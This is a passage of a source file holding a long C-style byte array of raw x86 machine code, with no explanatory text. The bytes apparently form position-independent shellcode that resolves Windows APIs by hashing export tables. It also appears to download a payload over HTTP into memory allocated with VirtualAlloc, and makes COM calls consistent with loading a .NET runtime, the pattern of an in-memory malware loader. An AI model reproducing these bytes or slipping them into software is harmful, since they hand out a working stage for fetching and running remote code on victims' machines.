153 | 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56, | |
154 | 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f, | |
155 | 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84, | |
156 | 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f, | |
157 | 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d, | |
158 | 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00, | |
159 | 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, | |
160 | 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74, | |
161 | 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d, | |
162 | 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50, | |
163 | 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56, | |
164 | 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, | |
165 | 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, | |
166 | 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68, | |
167 | 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85, | |
168 | 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75, | |
169 | 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, | |
170 | 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05, | |
171 | 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c, | |
172 | 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04, | |
173 | 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56, | |
174 | 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, | |
175 | 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33, | |
176 | 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff, | |
177 | 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, | |
178 | 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00, | |
179 | 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00, | |
180 | 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00, | |
181 | 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14, | |
182 | 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff, | |
183 | 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b, | |
184 | 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00, | |
185 | 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, | |
186 | 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00, | |
187 | 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57, | |
188 | 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5, | |
189 | 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f, | |
190 | 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6, | |
191 | 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03, | |
192 | 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44, | |
193 | 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74, | |
194 | 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00, | |
195 | 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08, | |
196 | 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4, | |
197 | 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02, | |
198 | 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14, | |
199 | 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, | |
200 | 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4, | |
201 | 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c, | |
202 | 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02, | |
203 | 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03, | |
204 | 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83, | |
205 | 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00, | |
206 | 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d, | |
207 | 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83, | |
208 | 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, | |
209 | 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24, | |
210 | 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b, | |
211 | 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73, | |
212 | 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b, | |
213 | 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04, | |
214 | 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75, | |
215 | 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca, | |
216 | 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1, | |
217 | 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41, | |
218 | 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, | |
219 | 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56, | |
220 | 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff, | |
221 | 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b, | |
222 | 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b, | |
223 | 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, | |
224 | 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, | |
225 | 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9, | |
226 | 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b, | |
227 | 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, | |
228 | 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, | |
229 | 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9, | |
230 | 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50, | |
231 | 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85, | |
232 | 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04, | |
233 | 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, | |
234 | 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10, | |
235 | 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00, | |
236 | 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00, | |
237 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04, | |
238 | 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff, | |
239 | 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00, | |
240 | 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24, | |
241 | 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16, | |
242 | 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, | |
243 | 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2, | |
244 | 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03, | |
245 | 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, | |
246 | 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45, | |
247 | 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75, | |
248 | 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff, | |
249 | 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f, | |
250 | 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf, | |
251 | 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, | |
252 | 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf, | |
253 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00, | |
254 | 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
255 | 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00, | |
256 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e, | |
257 | 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
258 | 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b, | |
259 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, | |
260 | 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, | |
261 | 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9, | |
262 | 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, | |
263 | 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, | |
264 | 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00, | |
265 | 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, | |
266 | 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, | |
267 | 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69, | |
268 | 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, | |
269 | 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04, | |
270 | 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30, | |
271 | 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf, | |
272 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00, | |
273 | 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
274 | 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, | |
275 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e, | |
276 | 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
277 | 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, | |
278 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8, | |
279 | 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, | |
280 | 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9, | |
281 | 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, | |
282 | 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, | |
283 | 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00, | |
284 | 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, | |
285 | 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, | |
286 | 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85, | |
287 | 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, | |
288 | 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04, | |
289 | 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60, | |
290 | 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf, | |
291 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00, | |
292 | 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
293 | 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, | |
294 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d, | |
295 | 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
296 | 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, | |
297 | 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03, | |
298 | 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00, | |
299 | 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78, | |
300 | 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, | |
301 | 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f, | |
302 | 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8, | |
303 | 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, | |
304 | 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84, | |
305 | 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, | |
306 | 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c, | |
307 | 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, | |
308 | 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00, | |
309 | 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, | |
310 | 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40, | |
311 | 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04, | |
312 | 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08, | |
313 | 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04, | |
314 | 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00, | |
315 | 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff, | |
316 | 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b, | |
317 | 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07, | |
318 | 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89, | |
319 | 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00, | |
320 | 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01, | |
321 | 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, | |
322 | 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89, | |
323 | 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c, | |
324 | 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff, | |
325 | 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07, | |
326 | 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, | |
327 | 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00, | |
328 | 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04, | |
329 | 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50, | |
330 | 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01, | |
331 | 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, | |
332 | 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00, | |
333 | 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46, | |
334 | 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28, | |
335 | 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f, | |
336 | 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24, | |
337 | 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00, | |
338 | 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5, | |
339 | 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19, | |
340 | 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a, | |
341 | 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84, | |
342 | 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39, | |
343 | 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10, | |
344 | 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19, | |
345 | 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00, | |
346 | 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3, | |
347 | 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57, | |
348 | 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b, | |
349 | 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47, | |
350 | 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39, | |
351 | 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19, | |
352 | 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00, | |
353 | 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3, | |
354 | 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b, | |
355 | 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff, | |
356 | 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08, | |
357 | 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04, | |
358 | 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85, | |
359 | 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0, | |
360 | 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0, | |
361 | 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24, | |
362 | 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33, | |
363 | 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00, | |
364 | 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01, | |
365 | 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14, | |
366 | 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0, | |
